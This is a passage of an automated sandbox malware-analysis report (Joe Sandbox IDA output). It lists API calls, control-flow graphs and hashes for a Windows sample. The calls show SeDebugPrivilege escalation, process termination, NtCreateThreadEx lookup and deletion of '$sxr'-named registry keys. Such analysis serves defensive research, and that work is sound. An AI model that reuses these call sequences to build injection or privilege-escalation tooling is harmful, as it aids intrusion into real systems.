                                                                                                                      • Instruction Fuzzy Hash: 8A513075D00219ABDB14DFD5CE84AAFBBB8FF0D300F10446AE645BB290D7789A41CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • SysAllocString.OLEAUT32($sxrsvc32), ref: 004013E7
                                                                                                                      • SysAllocString.OLEAUT32(00402114), ref: 004013F1
                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000), ref: 004013FA
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401414
                                                                                                                      • CoCreateInstance.OLE32(00402098,00000000,00000001,00402088,?), ref: 0040143F
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00401451
                                                                                                                      • CoUninitialize.OLE32 ref: 004014DE
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004014F0
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004014F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                      • String ID: $sxrsvc32
                                                                                                                      • API String ID: 4184240511-78464866
                                                                                                                      • Opcode ID: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                                      • Instruction ID: 8a654483f6148525abe5e909ff2a9399e1f522979beb927b6318c92976265d17
                                                                                                                      • Opcode Fuzzy Hash: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                                      • Instruction Fuzzy Hash: 55415271E00218AFDB00DFA9CD899AF7BBDEF45354B100069F905FB1A0C6B5AD05CBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040133E: GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                                        • Part of subcall function 0040133E: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                                        • Part of subcall function 0040133E: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                                        • Part of subcall function 0040133E: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                                        • Part of subcall function 0040133E: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                                        • Part of subcall function 0040133E: GetLastError.KERNEL32 ref: 004013B6
                                                                                                                        • Part of subcall function 0040133E: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004013C5
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                                      • RegDeleteValueW.KERNELBASE(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Heap$Open$TokenValue$AdjustAllocChangeCloseCurrentDeleteErrorFindFreeLastLookupNotificationPrivilegePrivileges
                                                                                                                      • String ID: $sxrstager$SOFTWARE
                                                                                                                      • API String ID: 2353213234-1606840681
                                                                                                                      • Opcode ID: d6fe065efa0b92b2caeb308442f95c4532e4efd9946b2338f3fdf9202a6ba47c
                                                                                                                      • Instruction ID: e2b15fd1bdb0af68db2fceded59578336af26d801dc78018de8527ed98e595ed
                                                                                                                      • Opcode Fuzzy Hash: d6fe065efa0b92b2caeb308442f95c4532e4efd9946b2338f3fdf9202a6ba47c
                                                                                                                      • Instruction Fuzzy Hash: B401A531B00310BBE7107BF59E4EB6F776D9B44705F00043AF706F62E2DAB89A418658
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 71 401292-4012c0 GetProcessHeap HeapAlloc call 401081 74 4012c2-4012c8 71->74 75 40130c-40131e GetProcessHeap RtlFreeHeap 71->75 76 4012ca-4012cb 74->76 77 40130b 74->77 78 4012cd-4012d6 76->78 77->75 79 401302-401308 78->79 80 4012d8-4012db 78->80 79->78 82 40130a 79->82 80->79 81 4012dd-4012ee OpenProcess 80->81 81->79 83 4012f0-4012fc TerminateProcess CloseHandle 81->83 82->77 83->79
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040129E
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012A5
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                                        • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                                        • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                                        • Part of subcall function 00401081: K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                                        • Part of subcall function 00401081: OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                                        • Part of subcall function 00401081: K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                                        • Part of subcall function 00401081: ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                                        • Part of subcall function 00401081: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 004011EB
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                                        • Part of subcall function 00401081: HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040120C
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012E3
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012F3
                                                                                                                      • CloseHandle.KERNEL32(000003E8,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012FC
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040130F
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 00401316
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeOpen$ChangeFindHandleMemoryModulesNotificationProcessesReadTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1088988999-0
                                                                                                                      • Opcode ID: 757573c93e28f14fb1ba0b7102d0f3237b6072edb6f5997e5a0090194d86dbfe
                                                                                                                      • Instruction ID: ab2b09c8b71ca9c99a709ec0924a6b803fad294693bd42ca56058f473aaebc13
                                                                                                                      • Opcode Fuzzy Hash: 757573c93e28f14fb1ba0b7102d0f3237b6072edb6f5997e5a0090194d86dbfe
                                                                                                                      • Instruction Fuzzy Hash: B601C071A00301ABEB116BE48F0DB5F77A8EB04712F144136EA05B22E1DBB88D40C768
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 84 4014fc-401502 call 401509 ExitProcess
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401509: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                                        • Part of subcall function 00401509: RegDeleteValueW.KERNELBASE(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                                        • Part of subcall function 00401509: GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                                        • Part of subcall function 00401509: HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                                        • Part of subcall function 00401509: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                                        • Part of subcall function 00401509: RtlFreeHeap.NTDLL(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                                      • ExitProcess.KERNEL32 ref: 00401502
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocDeleteExitFreeOpenValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3703222776-0
                                                                                                                      • Opcode ID: a5779c28a6b8967d7da92993e240726da911757312e1828e8db22bb694370d56
                                                                                                                      • Instruction ID: d57de1a7dd692de033d0a6d08cf0830a53249df09c6425f09644fba4c2c840d6
                                                                                                                      • Opcode Fuzzy Hash: a5779c28a6b8967d7da92993e240726da911757312e1828e8db22bb694370d56
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,00000000,000F013F,000003E8,?,00000000), ref: 00401022
                                                                                                                      • RegDeleteKeyW.ADVAPI32(000003E8,?), ref: 00401038
                                                                                                                      • RegEnumKeyExW.ADVAPI32(000003E8,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00401058
                                                                                                                      • RegCloseKey.ADVAPI32(000003E8,?,00000000), ref: 00401065
                                                                                                                      • RegDeleteKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,000F013F,00000000,?,00000000), ref: 00401077
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Delete$CloseEnumOpen
                                                                                                                      • String ID: SOFTWARE\$sxrconfig
                                                                                                                      • API String ID: 3013565938-435319591
                                                                                                                      • Opcode ID: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                                      • Instruction ID: d544ddb297f42690969b4a203d904ba38e423bc2ba9d9ccdcf6cbbeeb35745ab
                                                                                                                      • Opcode Fuzzy Hash: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                                      • Instruction Fuzzy Hash: CD011271500288FBD7609B92DE4DEAB7ABCEBC5741F10007AB605F10A0DB745E44DA35
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 93 40131f-40132c GetModuleHandleA 94 40133b-40133d 93->94 95 40132e-40133a GetProcAddress 93->95
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,00401271,000003E8,001FFFFF,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00401593), ref: 00401324
                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00401334
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                                      • API String ID: 1646373207-690569937
                                                                                                                      • Opcode ID: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                                      • Instruction ID: d003ae9fd3514cd023d1297aa5e823454f89fcb9fe9eff1a1c2077655f61d9ec
                                                                                                                      • Opcode Fuzzy Hash: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                                      • Instruction Fuzzy Hash: 63C09270B423009AEE102B715F0DF0B3A686A40B42B1448B3B609F05E4DAFCC484D52C
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:40.9%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:88
                                                                                                                      Total number of Limit Nodes:13
                                                                                                                      execution_graph 30761 20d0b62b900 30764 20d0b62b911 _invalid_parameter_noinfo 30761->30764 30763 20d0b62b960 30764->30763 30765 20d0b62b8e0 HeapFree LoadLibraryExW LoadLibraryExW GetProcAddress _invalid_parameter_noinfo 30764->30765 30765->30763 30766 20d0b62db28 30767 20d0b62db38 30766->30767 30774 20d0b62fc4c 17 API calls 2 library calls 30767->30774 30769 20d0b62db4f 30770 20d0b62db41 30770->30769 30775 20d0b62d92c 19 API calls 30770->30775 30772 20d0b62db4a 30776 20d0b62da1c 30772->30776 30774->30770 30775->30772 30780 20d0b62da3a 30776->30780 30777 20d0b62da95 GetStdHandle 30779 20d0b62daa8 GetFileType 30777->30779 30777->30780 30778 20d0b62db0d 30778->30769 30779->30780 30780->30777 30780->30778 30781 20d0b62a608 30782 20d0b62a61d 30781->30782 30783 20d0b62a621 30781->30783 30793 20d0b62ccd8 25 API calls 30783->30793 30785 20d0b62a626 30794 20d0b62d1d0 GetEnvironmentStringsW 30785->30794 30788 20d0b62a633 30790 20d0b62b978 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 30788->30790 30790->30782 30791 20d0b62a640 30807 20d0b62b978 30791->30807 30793->30785 30795 20d0b62d1fe 30794->30795 30796 20d0b62d2a0 30794->30796 30812 20d0b62d120 WideCharToMultiByte 30795->30812 30798 20d0b62a62b 30796->30798 30799 20d0b62d2aa FreeEnvironmentStringsW 30796->30799 30798->30788 30806 20d0b62a674 16 API calls 3 library calls 30798->30806 30799->30798 30806->30791 30808 20d0b62b97d HeapFree 30807->30808 30809 20d0b62b9af 30807->30809 30808->30809 30810 20d0b62b998 30808->30810 30809->30788 30813 20d0b62b8e0 HeapFree LoadLibraryExW LoadLibraryExW GetProcAddress _invalid_parameter_noinfo 30810->30813 30813->30809 30814 7ff615508d80 30815 7ff615508da4 30814->30815 30816 7ff615508dbf Sleep 30815->30816 30817 7ff615508db6 30815->30817 30816->30815 30818 7ff615508ddb _amsg_exit 30817->30818 30821 7ff615508de7 30817->30821 30818->30821 30819 7ff615508e56 _initterm 30822 7ff615508e73 _IsNonwritableInCurrentImage 30819->30822 30820 7ff615508e3c 30821->30819 30821->30820 30821->30822 30828 7ff6155037d8 GetCurrentThreadId OpenThread 30822->30828 30861 7ff6155004f4 30828->30861 30830 7ff615503839 HeapSetInformation RegOpenKeyExW 30831 7ff61550e9f8 RegQueryValueExW RegCloseKey 30830->30831 30832 7ff61550388d 30830->30832 30834 7ff61550ea41 GetThreadLocale 30831->30834 30833 7ff615505920 VirtualQuery VirtualQuery 30832->30833 30835 7ff6155038ab GetConsoleOutputCP GetCPInfo 30833->30835 30837 7ff615503919 30834->30837 30835->30834 30836 7ff6155038f1 memset 30835->30836 30836->30837 30837->30831 30838 7ff615504d5c 391 API calls 30837->30838 30839 7ff61550eb27 _setjmp 30837->30839 30840 7ff615503948 _setjmp 30837->30840 30841 7ff6154f3240 166 API calls 30837->30841 30842 7ff615518530 370 API calls 30837->30842 30843 7ff6155001b8 6 API calls 30837->30843 30844 7ff615504c1c 166 API calls 30837->30844 30845 7ff6154fdf60 481 API calls 30837->30845 30846 7ff61550eb71 _setmode 30837->30846 30847 7ff6155086f0 182 API calls 30837->30847 30848 7ff615500580 12 API calls 30837->30848 30850 7ff6155058e4 EnterCriticalSection LeaveCriticalSection 30837->30850 30852 7ff6154fbe00 647 API calls 30837->30852 30853 7ff6155058e4 EnterCriticalSection LeaveCriticalSection 30837->30853 30838->30837 30839->30837 30840->30837 30841->30837 30842->30837 30843->30837 30844->30837 30845->30837 30846->30837 30847->30837 30849 7ff61550398b GetConsoleOutputCP GetCPInfo 30848->30849 30851 7ff6155004f4 GetModuleHandleW GetProcAddress SetThreadLocale 30849->30851 30850->30837 30851->30837 30852->30837 30854 7ff61550ebbe GetConsoleOutputCP GetCPInfo 30853->30854 30855 7ff6155004f4 GetModuleHandleW GetProcAddress SetThreadLocale 30854->30855 30856 7ff61550ebe6 30855->30856 30857 7ff6154fbe00 647 API calls 30856->30857 30858 7ff615500580 12 API calls 30856->30858 30857->30856 30859 7ff61550ebfc GetConsoleOutputCP GetCPInfo 30858->30859 30860 7ff6155004f4 GetModuleHandleW GetProcAddress SetThreadLocale 30859->30860 30860->30837 30862 7ff615500504 30861->30862 30863 7ff61550051e GetModuleHandleW 30862->30863 30864 7ff61550054d GetProcAddress 30862->30864 30865 7ff61550056c SetThreadLocale 30862->30865 30863->30862 30864->30862 30867 20d0b5f29a0 30869 20d0b5f29ce 30867->30869 30868 20d0b5f2b3f 30869->30868 30870 20d0b5f2a2c VirtualAlloc 30869->30870 30870->30868 30872 20d0b5f2a50 30870->30872 30871 20d0b5f2ac3 LoadLibraryA 30871->30872 30872->30868 30872->30871
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                      • API String ID: 3305344409-4288247545
                                                                                                                      • Opcode ID: 08bac76f509f6fd3fc69dc4d9486e559aed501487721408e7d77705ceb207560
                                                                                                                      • Instruction ID: f83e602e50128556b9bf9fe6c6e1fdafb5d2944b68d106f594f012e56501c76f
                                                                                                                      • Opcode Fuzzy Hash: 08bac76f509f6fd3fc69dc4d9486e559aed501487721408e7d77705ceb207560
                                                                                                                      • Instruction Fuzzy Hash: 71429039A08E8285EB649B2198502B9F7A1EF85FB8F444236D95EC77F5DF3CE9458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 216 7ff6154faa54-7ff6154faa98 call 7ff6154fcd90 219 7ff61550bf5a-7ff61550bf70 call 7ff615504c1c call 7ff6154fff70 216->219 220 7ff6154faa9e 216->220 221 7ff6154faaa5-7ff6154faaa8 220->221 223 7ff6154facde-7ff6154fad00 221->223 224 7ff6154faaae-7ff6154faac8 wcschr 221->224 230 7ff6154fad06 223->230 224->223 227 7ff6154faace-7ff6154faae9 towlower 224->227 227->223 229 7ff6154faaef-7ff6154faaf3 227->229 233 7ff61550beb7-7ff61550bec4 call 7ff61551eaf0 229->233 234 7ff6154faaf9-7ff6154faafd 229->234 231 7ff6154fad0d-7ff6154fad1f 230->231 237 7ff6154fad22-7ff6154fad2a call 7ff6155013e0 231->237 246 7ff61550bec6-7ff61550bed8 call 7ff6154f3240 233->246 247 7ff61550bf43-7ff61550bf59 call 7ff615504c1c 233->247 235 7ff6154fab03-7ff6154fab07 234->235 236 7ff61550bbcf 234->236 239 7ff6154fab7d-7ff6154fab81 235->239 240 7ff6154fab09-7ff6154fab0d 235->240 249 7ff61550bbde 236->249 237->221 244 7ff61550be63 239->244 248 7ff6154fab87-7ff6154fab95 239->248 243 7ff6154fab13-7ff6154fab17 240->243 240->244 243->239 250 7ff6154fab19-7ff6154fab1d 243->250 255 7ff61550be72-7ff61550be88 call 7ff6154f3278 call 7ff615504c1c 244->255 246->247 263 7ff61550beda-7ff61550bee9 call 7ff6154f3240 246->263 247->219 253 7ff6154fab98-7ff6154faba0 248->253 259 7ff61550bbea-7ff61550bbec 249->259 250->249 254 7ff6154fab23-7ff6154fab27 250->254 253->253 258 7ff6154faba2-7ff6154fabb3 call 7ff6154fcd90 253->258 254->259 261 7ff6154fab2d-7ff6154fab31 254->261 283 7ff61550be89-7ff61550be8c 255->283 258->219 269 7ff6154fabb9-7ff6154fabde call 7ff6155013e0 call 7ff6155033a8 258->269 265 7ff61550bbf8-7ff61550bc01 259->265 261->230 266 7ff6154fab37-7ff6154fab3b 261->266 277 7ff61550beeb-7ff61550bef1 263->277 278 7ff61550bef3-7ff61550bef9 263->278 265->231 266->265 270 7ff6154fab41-7ff6154fab45 266->270 305 7ff6154fac75 269->305 306 7ff6154fabe4-7ff6154fabe7 269->306 274 7ff61550bc06-7ff61550bc2a call 7ff6155013e0 270->274 275 7ff6154fab4b-7ff6154fab4f 270->275 294 7ff61550bc5a-7ff61550bc61 274->294 295 7ff61550bc2c-7ff61550bc4c _wcsnicmp 274->295 281 7ff6154fab55-7ff6154fab78 call 7ff6155013e0 275->281 282 7ff6154fad2f-7ff6154fad33 275->282 277->247 277->278 278->247 284 7ff61550befb-7ff61550bf0d call 7ff6154f3240 278->284 281->221 288 7ff61550bc66-7ff61550bc8a call 7ff6155013e0 282->288 289 7ff6154fad39-7ff6154fad3d 282->289 291 7ff6154facbe 283->291 292 7ff61550be92-7ff61550beaa call 7ff6154f3278 call 7ff615504c1c 283->292 284->247 303 7ff61550bf0f-7ff61550bf21 call 7ff6154f3240 284->303 324 7ff61550bc8c-7ff61550bcaa _wcsnicmp 288->324 325 7ff61550bcc4-7ff61550bcdc 288->325 297 7ff6154fad43-7ff6154fad49 289->297 298 7ff61550bcde-7ff61550bd02 call 7ff6155013e0 289->298 301 7ff6154facc0-7ff6154facc7 291->301 337 7ff61550beab-7ff61550beb6 call 7ff615504c1c 292->337 309 7ff61550bd31-7ff61550bd4f _wcsnicmp 294->309 295->294 304 7ff61550bc4e-7ff61550bc55 295->304 307 7ff6154fad4f-7ff6154fad68 297->307 308 7ff61550bd5e-7ff61550bd65 297->308 328 7ff61550bd2a 298->328 329 7ff61550bd04-7ff61550bd24 _wcsnicmp 298->329 301->301 311 7ff6154facc9-7ff6154facda 301->311 303->247 339 7ff61550bf23-7ff61550bf35 call 7ff6154f3240 303->339 319 7ff61550bbb3-7ff61550bbb7 304->319 316 7ff6154fac77-7ff6154fac7f 305->316 306->291 321 7ff6154fabed-7ff6154fac0b call 7ff6154fcd90 * 2 306->321 322 7ff6154fad6d-7ff6154fad70 307->322 323 7ff6154fad6a 307->323 308->307 320 7ff61550bd6b-7ff61550bd73 308->320 317 7ff61550bbc2-7ff61550bbca 309->317 318 7ff61550bd55 309->318 311->223 316->291 335 7ff6154fac81-7ff6154fac85 316->335 317->221 318->308 330 7ff61550bbba-7ff61550bbbd call 7ff6155013e0 319->330 331 7ff61550bd79-7ff61550bd8b iswxdigit 320->331 332 7ff61550be4a-7ff61550be5e 320->332 321->337 356 7ff6154fac11-7ff6154fac14 321->356 322->237 323->322 324->325 336 7ff61550bcac-7ff61550bcbf 324->336 325->309 328->309 329->328 338 7ff61550bbac 329->338 330->317 331->332 342 7ff61550bd91-7ff61550bda3 iswxdigit 331->342 332->330 340 7ff6154fac88-7ff6154fac8f 335->340 336->319 337->233 338->319 339->247 357 7ff61550bf37-7ff61550bf3e call 7ff6154f3240 339->357 340->340 348 7ff6154fac91-7ff6154fac94 340->348 342->332 345 7ff61550bda9-7ff61550bdbb iswxdigit 342->345 345->332 352 7ff61550bdc1-7ff61550bdd7 iswdigit 345->352 348->291 351 7ff6154fac96-7ff6154facaa wcsrchr 348->351 351->291 358 7ff6154facac-7ff6154facb9 call 7ff615501300 351->358 354 7ff61550bdd9-7ff61550bddd 352->354 355 7ff61550bddf-7ff61550bdeb towlower 352->355 361 7ff61550bdee-7ff61550be0f iswdigit 354->361 355->361 356->337 362 7ff6154fac1a-7ff6154fac33 memset 356->362 357->247 358->291 363 7ff61550be17-7ff61550be23 towlower 361->363 364 7ff61550be11-7ff61550be15 361->364 362->305 365 7ff6154fac35-7ff6154fac4b wcschr 362->365 366 7ff61550be26-7ff61550be45 call 7ff6155013e0 363->366 364->366 365->305 367 7ff6154fac4d-7ff6154fac54 365->367 366->332 368 7ff6154fad72-7ff6154fad91 wcschr 367->368 369 7ff6154fac5a-7ff6154fac6f wcschr 367->369 371 7ff6154faf03-7ff6154faf07 368->371 372 7ff6154fad97-7ff6154fadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff6154fadb2-7ff6154fadc7 wcschr 372->373 373->371 374 7ff6154fadcd-7ff6154fade2 wcschr 373->374 374->371 375 7ff6154fade8-7ff6154fadfd wcschr 374->375 375->371 376 7ff6154fae03-7ff6154fae18 wcschr 375->376 376->371 377 7ff6154fae1e-7ff6154fae21 376->377 378 7ff6154fae24-7ff6154fae27 377->378 378->371 379 7ff6154fae2d-7ff6154fae40 iswspace 378->379 380 7ff6154fae42-7ff6154fae49 379->380 381 7ff6154fae4b-7ff6154fae5e 379->381 380->378 382 7ff6154fae66-7ff6154fae6d 381->382 382->382 383 7ff6154fae6f-7ff6154fae77 382->383 383->255 384 7ff6154fae7d-7ff6154fae97 call 7ff6155013e0 383->384 387 7ff6154fae9a-7ff6154faea4 384->387 388 7ff6154faebc-7ff6154faef8 call 7ff615500a6c call 7ff6154fff70 * 2 387->388 389 7ff6154faea6-7ff6154faead 387->389 388->316 397 7ff6154faefe 388->397 389->388 390 7ff6154faeaf-7ff6154faeba 389->390 390->387 390->388 397->283
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                                                                      • String ID: :$:$:$:ON$OFF
                                                                                                                      • API String ID: 4076514806-467788257
